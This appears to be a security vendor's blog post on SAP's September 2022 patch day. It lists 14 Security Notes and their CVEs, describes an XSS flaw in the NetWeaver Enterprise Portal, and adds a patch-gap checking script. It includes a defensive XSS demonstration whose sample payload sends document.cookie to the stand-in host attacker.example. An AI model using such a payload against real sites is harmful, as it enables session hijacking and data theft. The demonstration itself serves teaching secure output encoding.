Arpine Maghakyan

Security Researcher of RedRays.

SAP Security Patch Day – September 2022

Because the SAP threat landscape keeps expanding, businesses of every size and sector are exposed to cyberattacks. The following report covers the most recent security flaws and threats.

Summary 

This month SAP released 14 Security Notes. The most severe is the privilege escalation vulnerability in the SAP SuccessFactors attachment API for Mobile Application (Android & iOS), SAP Security Note 3226411 (CVE-2022-35291), with a CVSS score of 8.1.
At redrays.io you can find more information about these vulnerabilities and the measures available to protect your SAP systems; exploits for the most critical ones are already in the RedRays Security Platform's database.

SAP Security Notes Overview

On 13 September 2022, SAP published 14 new Security Notes for its September Security Patch Day.

Five of the released Security Notes are classified as High Priority; the highest CVSS score this month is 8.1. The two most frequent vulnerability categories this month are information disclosure and cross-site scripting (XSS).

One medium-priority vulnerability discovered by the RedRays research and development team was patched this month.

The details of the SAP vulnerability discovered by RedRays researchers are listed below.

  • 3219164: [CVE-2022-35298] Cross-Site Scripting (XSS) vulnerability in SAP NetWeaver Enterprise Portal (KMC)
    CVSS Base Score: 6.1
    Affected version: 7.50. An update is available in SAP Security Note 3219164.
    An attacker can use the cross-site scripting vulnerability to inject a malicious script into a page served by the portal. The script runs in the victim's browser and can read cookies, session tokens, and any other data the browser stores for that web application. With that, the attacker can take over the user's session and read business-critical information, and in some cases modify it. XSS can also be used to alter the content displayed to the user without authorization.
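The following is an added illustration, not code from RedRays or from SAP, of the mechanism described above: the same attacker-supplied string inserted into a page verbatim (the vulnerable pattern) and after HTML encoding (the fix), plus a check of the one cookie attribute that limits session-cookie theft. The payload, the search-page fragment and the Set-Cookie headers are constructed for the example; the host name attacker.example is hypothetical.

```python
import html
import re
from typing import List

# Constructed attacker input of the kind used against a reflected XSS flaw:
# it tries to send the victim's cookies to an attacker-controlled host
# (hypothetical host name, no real endpoint involved).
PAYLOAD = '<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">'


def render_search_unsafe(term: str) -> str:
    """Vulnerable pattern: untrusted input concatenated straight into HTML."""
    return f"<p>Results for: {term}</p>"


def render_search_safe(term: str) -> str:
    """Hardened pattern: HTML-encode the input before placing it in an HTML text node."""
    return f"<p>Results for: {html.escape(term, quote=True)}</p>"


# Simplified tag tokenizer used only to show what a browser would parse as markup.
_TAG_RE = re.compile(r"<\/?([A-Za-z][A-Za-z0-9]*)[^>]*>")


def tag_names(document: str) -> List[str]:
    """Names of the HTML tags present in the string, in document order."""
    return [m.group(1).lower() for m in _TAG_RE.finditer(document)]


def cookie_readable_by_script(set_cookie_header: str) -> bool:
    """True if a Set-Cookie header lacks HttpOnly, i.e. the cookie is exposed to
    document.cookie and therefore to any script injected through XSS.
    (HttpOnly limits cookie theft; it does not prevent the XSS itself.)"""
    attributes = [a.strip().lower() for a in set_cookie_header.split(";")[1:]]
    return "httponly" not in attributes


if __name__ == "__main__":
    print("unsafe :", tag_names(render_search_unsafe(PAYLOAD)))  # an <img> tag reaches the browser
    print("safe   :", tag_names(render_search_safe(PAYLOAD)))    # only the wrapper <p> remains
    for header in ("JSESSIONID=abc; Path=/; Secure; HttpOnly", "JSESSIONID=abc; Path=/"):
        print(header, "-> readable by script:", cookie_readable_by_script(header))
```

Run the script directly to see the two renderings side by side. The encoded output still contains the text `onerror=` but no `<`, so the browser treats it as literal text; that, not filtering of keywords, is the property the portal fix restores.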

The vulnerabilities released this month are fixed by the following SAP Security Notes:

  • 3223392 [CVE-2022-35292] Windows Unquoted Service Path issue in SAP Business One
  • 3219164 [CVE-2022-35298] Cross-Site Scripting (XSS) vulnerability in SAP NetWeaver Enterprise Portal (KMC)
  • 3217303 [CVE-2022-39014] Information Disclosure vulnerability in SAP BusinessObjects Business Intelligence Platform (CMC)
  • 3159736 [CVE-2022-35295] Privilege Escalation Vulnerability in SAPOSCOL on Unix
  • 3198137 Update 1 to Security Note 3165333 – [CVE-2022-28215] URL Redirection vulnerability in SAP NetWeaver ABAP Server and ABAP Platform
  • 3126968 Information Disclosure vulnerability in SAP CRM WebClient
  • 2998510 [CVE-2022-28214] Central Management Server Information Disclosure in Business Intelligence Update
  • 3237075 [CVE-2022-39801] Insufficient Firefighter Session Expiration in SAP GRC Access Control Emergency Access Management
  • 3229820 [CVE-2022-39799] Cross-Site Scripting (XSS) vulnerability in SAP NetWeaver AS ABAP (SAP GUI for HTML within the Fiori Launchpad)
  • 3226411 [CVE-2022-35291] Privilege escalation vulnerability in SAP SuccessFactors attachment API for Mobile Application(Android & iOS)
  • 2634023 Missing authorization check in Consumption of CDS Views (or) OData Services in QM-QN
  • 3218177 [CVE-2022-35294] Cross-Site Scripting (XSS) vulnerability in SAP NetWeaver Application Server ABAP
  • 3165333 [CVE-2022-28215] URL Redirection vulnerability in SAP NetWeaver ABAP Server and ABAP Platform
  • 3150454 Information Disclosure vulnerability in SAP NetWeaver Application Server ABAP and ABAP Platform


Our team strongly advises installing all of these SAP Security Notes to minimize the risk of compromise.
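A practical way to act on that advice is to compare the list above with the notes already implemented on each system. The script below is an added example, not RedRays tooling or SAP code: it parses the bullet lines in the format used in this report (note number, optional CVE, title) and reports the notes missing from a one-number-per-line export of implemented notes. The applied-notes text is constructed for the example, and the assumption that your export (for instance from the Note Assistant) yields one note number per line is one you should check against your own tooling.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Set

# This month's notes, copied from the list above in the report's own format.
ADVISORY_LINES = """\
3223392 [CVE-2022-35292] Windows Unquoted Service Path issue in SAP Business One
3219164 [CVE-2022-35298] Cross-Site Scripting (XSS) vulnerability in SAP NetWeaver Enterprise Portal (KMC)
3217303 [CVE-2022-39014] Information Disclosure vulnerability in SAP BusinessObjects Business Intelligence Platform (CMC)
3159736 [CVE-2022-35295] Privilege Escalation Vulnerability in SAPOSCOL on Unix
3198137 Update 1 to Security Note 3165333 - [CVE-2022-28215] URL Redirection vulnerability in SAP NetWeaver ABAP Server and ABAP Platform
3126968 Information Disclosure vulnerability in SAP CRM WebClient
2998510 [CVE-2022-28214] Central Management Server Information Disclosure in Business Intelligence Update
3237075 [CVE-2022-39801] Insufficient Firefighter Session Expiration in SAP GRC Access Control Emergency Access Management
3229820 [CVE-2022-39799] Cross-Site Scripting (XSS) vulnerability in SAP NetWeaver AS ABAP (SAP GUI for HTML within the Fiori Launchpad)
3226411 [CVE-2022-35291] Privilege escalation vulnerability in SAP SuccessFactors attachment API for Mobile Application(Android & iOS)
2634023 Missing authorization check in Consumption of CDS Views (or) OData Services in QM-QN
3218177 [CVE-2022-35294] Cross-Site Scripting (XSS) vulnerability in SAP NetWeaver Application Server ABAP
3165333 [CVE-2022-28215] URL Redirection vulnerability in SAP NetWeaver ABAP Server and ABAP Platform
3150454 Information Disclosure vulnerability in SAP NetWeaver Application Server ABAP and ABAP Platform
"""

# Constructed example of an applied-notes export: one note number per line.
# (Assumed format; adapt parse_applied() to what your export really looks like.)
APPLIED_NOTES = """\
3223392
3219164
3217303
3159736
2634023
"""


@dataclass(frozen=True)
class Note:
    number: str
    cve: Optional[str]
    title: str


_LINE_RE = re.compile(r"^\s*(\d{7})\s+(.*\S)\s*$")   # "<7-digit note> <rest of line>"
_CVE_RE = re.compile(r"CVE-\d{4}-\d{4,}")


def parse_advisory(text: str) -> List[Note]:
    """Turn the report's bullet lines into Note records; lines that do not
    start with a 7-digit note number are ignored."""
    notes = []
    for line in text.splitlines():
        m = _LINE_RE.match(line)
        if not m:
            continue
        number, rest = m.groups()
        cve = _CVE_RE.search(rest)            # the CVE may sit anywhere in the title
        notes.append(Note(number, cve.group(0) if cve else None, rest))
    return notes


def parse_applied(text: str) -> Set[str]:
    """Note numbers from the one-per-line export of implemented notes."""
    return set(re.findall(r"\b\d{7}\b", text))


def missing_notes(advisory: str, applied: str) -> List[Note]:
    """Notes from the advisory that are not in the applied-notes export."""
    done = parse_applied(applied)
    return [n for n in parse_advisory(advisory) if n.number not in done]


def cve_for(advisory: str, number: str) -> Optional[str]:
    """CVE identifier recorded for a note, or None if the note lists none."""
    for n in parse_advisory(advisory):
        if n.number == number:
            return n.cve
    return None


if __name__ == "__main__":
    for n in missing_notes(ADVISORY_LINES, APPLIED_NOTES):
        print(f"MISSING {n.number} {n.cve or '(no CVE)':<16} {n.title}")
```

The CVE field is kept so the output can be cross-referenced with an external vulnerability feed; notes without a CVE (for example 3126968 and 2634023) are reported just the same, since the absence of a CVE says nothing about whether the note is needed.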
